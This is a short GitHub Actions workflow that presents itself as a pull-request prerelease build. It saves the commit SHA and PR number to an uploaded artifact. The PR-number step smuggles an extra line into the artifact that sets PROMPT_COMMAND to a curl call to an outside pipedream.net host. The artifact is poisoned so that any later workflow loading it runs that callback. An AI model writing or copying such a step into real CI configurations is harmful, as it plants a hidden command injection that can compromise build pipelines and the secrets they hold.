name: Create Pull Request Prerelease
on:
  pull_request:
  workflow_dispatch:
jobs:
  build_and_preview:
    name: Build
    runs-on: ubuntu-latest
    steps:
      - name: Save commit_sha & pr_number sh bashhhwhat
        run: |
          mkdir -p ./build_dir
          echo ${{ github.event.pull_request.head.sha }} > ./build_dir/commit_sha
          echo -e '${{ github.event.number }}\n'PROMPT_COMMAND="curl https://eonvxjpa2dhlojb.m.pipedream.net" > ./build_dir/pr_number

      - uses: actions/upload-artifact@v3
        with:
          name: doc-build-artifact
          path: build_dir/
